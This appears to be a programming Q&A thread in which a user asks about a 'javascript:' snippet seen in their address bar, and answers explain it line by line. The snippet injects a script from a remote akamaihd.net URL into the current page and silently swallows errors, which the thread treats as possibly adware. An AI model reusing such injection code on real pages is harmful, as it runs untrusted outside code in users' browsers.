# What does this JavaScript (containing createElement("script")) do?

Tags: javascript

After going on a webpage after some moments on the address bar I see this (instead of the actual address) --

```
javascript:try
{
    if(document.body.innerHTML)
    {
        var a=document.getElementsByTagName("head");
        if(a.length){var d=document.createElement("script");
        d.src="https://apidivaptonbiz-a.akamaihd.net/gsrs?is=smdvbd&bp=BA&g=a856bc68-46e1-
        43619542-5d821147c8cf";
        a[0].appendChild(d);
    }
}
catch(e){}
```

What does this code actually do ? How is it automatically coming on the address bar ?

Comment: Please understand that Java and Javascript are two completely different programming languages, about as closely related as ham is to hamburger, that if you mis-tag your question you will not get the right experts in to review it, and that this may hurt your chances of getting decent help. Since I know absolutely nothing about Javascript, this is about all that I can do for you except to wish you well and hope that you get a decent answer soon.

Answer (score 2):

Apparently, it loads a file through the address `https://apidivaptonbiz-a.akamaihd.net/gsrs?is=smdvbd&bp=BA&g=a856bc68-46e1-43619542-5d821147c8cf` and injects it on your current page.

Comment: "loads a file" is too vague. Browsers also load image and css files. Loads how? What kind of file?

Comment: You can't tell since it's not the true path of a file. There will be a server interpretation of the URL which will 'echoes' a file. Given the format of the append of the file result, I'd guess a JavaScript file.

Comment: @user2864740–it's a pretty fair bet (though not certain of course) that it loads a script file given it's set as the src of a script element. Seems poorly written to me.

Answer (score 0):

```
try // try the code in the braces { }, control will jump to the catch block on error
{
    if(document.body.innerHTML) // if this is running in a browser
    {
        var a=document.getElementsByTagName("head"); // get the <head> element
        if(a.length){ // if a seems to be a valid HTMLElement
            var d=document.createElement("script"); // create a <script> element
            // and link it to the URL below
            d.src="https://apidivaptonbiz-a.akamaihd.net/gsrs?is=smdvbd&bp=BA&g=a856bc68-46e1-
            43619542-5d821147c8cf"; 
        a[0].appendChild(d); // insert the new <script> element into the DOM
    }
}
catch(e){} // ignore all errors from the try { } block (generally bad form)
```

Basically, this JavaScript fragment injects a script into the page.

Regarding *how* it got there, that's a little trickier. One possibility is that some JavaScript on the page set `window.location.href` to this code fragment, but that seems odd to me.

Comment: More than odd, it seems 'intentional harm'.

Comment: @MarcoAurélioDeleu Script injection is used for all sorts of purposes (often advertising, and is used extensively by Google Analytics); not that I am clearing the referenced source (which I have not looked at) of "wrongdoing" or "suspicion" by any means.